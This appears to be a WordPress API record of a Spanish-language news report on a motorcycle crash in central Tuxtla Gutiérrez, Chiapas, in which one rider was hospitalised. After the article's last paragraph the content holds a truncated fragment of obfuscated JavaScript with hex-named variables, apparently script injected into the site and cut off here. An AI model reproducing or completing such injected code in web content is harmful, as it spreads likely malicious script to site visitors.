{"id":11360,"date":"2023-08-17T02:09:24","date_gmt":"2023-08-17T02:09:24","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11360"},"modified":"2023-08-17T02:09:25","modified_gmt":"2023-08-17T02:09:25","slug":"colisionan-motocicletas-en-el-centro-de-tuxtla-gutierrez","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11360","title":{"rendered":"Colisionan motocicletas en el centro de Tuxtla Guti\u00e9rrez"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1692238108614-1024x576.jpg\" alt=\"\" class=\"wp-image-11361\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1692238108614-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1692238108614-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1692238108614-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1692238108614.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 16 de agosto del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la tarde se registr\u00f3 un choque de motocicletas en la Avenida Central, entre 8a y 9a Oriente, en el centro de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el conductor de la motocicleta Italika de color negro con amarillo 250 cc que se desplazaba en el carril de Oriente a Poniente, la cual impact\u00f3 por alcance a otra motocicleta Italika de color rojo 150cc que circulaba con rumbo al Poniente de Tuxtla.<\/p>\n\n\n\n<p>Testigos relataron que, la primera unidad circulaba a exceso de velocidad y al no tener precaucion, impact\u00f3 la otra unidad.<\/p>\n\n\n\n<p>La segunda unidad sali\u00f3 disparada por el golpe y se impact\u00f3 contra otra motocicleta que estaba estacionada en esta zona.<\/p>\n\n\n\n<p>El conductor responsable termin\u00f3 con diferentes lesiones pero no quiso ser valorado.<\/p>\n\n\n\n<p>Param\u00e9dicos de la Cruz Roja atendieron al segundo lesionado que result\u00f3 con una presunta fractura en la cadera y pierna derecha, por lo que fue trasladado al hospital G\u00f3mez Maza para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>Las unidades fueron presentados ante el Ministerio P\u00fablico para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 16 de agosto del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la tarde se registr\u00f3 un choque de motocicletas en la Avenida Central, entre 8a y 9a Oriente, en el centro de Tuxtla Guti\u00e9rrez. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el conductor de la motocicleta Italika de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11361,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-11360","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11360","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11360"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11360\/revisions"}],"predecessor-version":[{"id":11362,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11360\/revisions\/11362"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11361"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11360"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11360"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11360"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}